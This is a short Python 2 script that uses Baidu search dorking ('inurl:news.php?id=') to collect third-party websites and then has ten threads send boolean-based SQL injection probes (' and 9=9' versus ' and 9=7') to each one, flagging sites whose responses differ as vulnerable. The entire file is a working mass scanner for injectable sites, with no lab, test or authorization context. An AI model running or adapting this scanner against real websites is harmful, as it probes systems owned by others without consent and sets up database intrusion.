#coding:utf-8
#https://www.baidu.com/s?wd=inurl%3Aphp&rsv_spt=1&rsv_iqid=0x9fc604c00000b964&issp=1&f=8&rsv_bp=1&rsv_idx=2&ie=utf-8&rqlang=cn&tn=baiduhome_pg&rsv_enter=1&oq=inurl%253A%2520php&rsv_t=2ea6WoxyzOEoJeLHJ3sd12REg1JCT0qR111yNAZbaSl8FRsB8UEv8sb%2BwNX1piedZyhw&inputT=783&rsv_pq=eedda3e10000bc39&rsv_sug3=28&rsv_sug2=0&rsv_sug4=1638

import requests as rqst
from bs4 import BeautifulSoup
from threading import Thread
import Queue
import time

q = Queue.Queue()

def srch(wd, pn):
	url = "http://www.baidu.com/s?wd="+wd+"&pn="+str((pn-1)*10)
	rp = rqst.get(url)
	html_doc = rp.content
	return html_doc


def psrHtml(html):
	tmp = set()
	soup = BeautifulSoup(html, "lxml")
	for i in soup.find_all("a"):#获取a标签
		link = i.get("href")#获取href 值
		try:
			if link.find("http://www.baidu.com/link?url=") != -1:
				tmp.add(link)
		except Exception as e:
			continue
	return tmp


def alyUrl2Queue(url_set):
	# tmp = set()
	for i in url_set:
		try:
			rp = rqst.get(i)
		except Exception as e:
			continue
		url = rp.url
		if url.find("baidu.com") != -1:
			continue
		print "[*]"+url
		q.put(url)
	# return tmp

def startIface(wd, pn):
	print "[INFO]Start search..."
	h = srch(wd, pn)
	ls = psrHtml(h)
	alyUrl2Queue(ls)


def scn():
	time.sleep(0.5)
	print "[THREAD]Scan thread is running..."
	while 1:
		time.sleep(0.5)
		# print "while"
		curl = q.get()
		payloads = {
		"src":curl,
		"bool_true":curl+" and 9=9",
		"bool_false":curl+" and 9=7"
		}

		print "[SCAN]" + curl
		try:
			r_src = rqst.get(payloads["src"]).headers["Content-Length"]
			r_true = rqst.get(payloads["bool_true"]).headers["Content-Length"]
			r_false = rqst.get(payloads["bool_false"]).headers["Content-Length"]
		except:
			continue

		if r_src == r_true:
			if r_true != r_false:
				print "[VUL]" + curl


if __name__ == '__main__':
        
	for i in range(10):
		t = Thread(target=scn)
		t.start()

	for x in range(1, 20):
		startIface("inurl:news.php?id=", x)
	print "...end"
